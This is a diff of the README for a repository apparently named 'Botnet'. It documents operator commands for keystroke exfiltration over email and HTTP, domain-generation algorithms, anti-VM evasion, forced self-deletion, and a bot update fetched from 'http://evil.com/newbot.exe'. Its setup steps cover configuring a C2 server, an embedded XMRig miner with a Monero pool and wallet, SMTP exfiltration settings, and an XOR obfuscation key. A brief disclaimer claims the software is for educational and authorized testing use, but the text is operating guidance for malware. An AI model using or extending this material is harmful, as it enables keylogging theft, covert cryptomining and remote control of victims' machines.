JonusNattapong/Botnet/README.md

 - `!cmd exfil` → Exfiltrate keystrokes (email + HTTP)
 - `!cmd dga` → Generate DGA domains
 - `!cmd antivm` → Advanced VM detection
-- `!cmd selfdelete` → Self-delete with PowerShell
 - `!cmd update http://evil.com/newbot.exe` → Update to new version
+- `!cmd selfdelete` → Forceful self-deletion

 ## Setup

+1. **XOR Key**: The default XOR key is `PRODUCT_KEY_2025`.
+Update this in `main.rs` for your own build.
+2. **Config File**: Edit `config.toml` to set your C2 server, mining pool, wallet, SMTP settings, etc. No recompilation needed!
-1. Replace `BASE64_XMRIG` with actual base64 encoded XMRig binary.
+3. **XMRig**: Replace `BASE64_XMRIG` with your optimized XMRig binary if embedding.
-2. Update `POOL_URL` and `WALLET` with real Monero mining pool and wallet.
-3. Configure SMTP settings for email exfil.
-4. Configure IRC server for C2.
+4. **Encrypted Strings**: No longer needed, as config is plain text with XOR key for obfuscation.

 ## Disclaimer

-This software is for educational purposes only.
-Use responsibly and within the bounds of the law.
+This software is for authorized security testing and educational purposes only.
+Unauthorized use is strictly prohibited.

-## Usage

-1. Configure the `config.toml` file for IRC settings (or hardcoded).
-2. Run the botnet client.
-3. Use the example commands to control the botnet.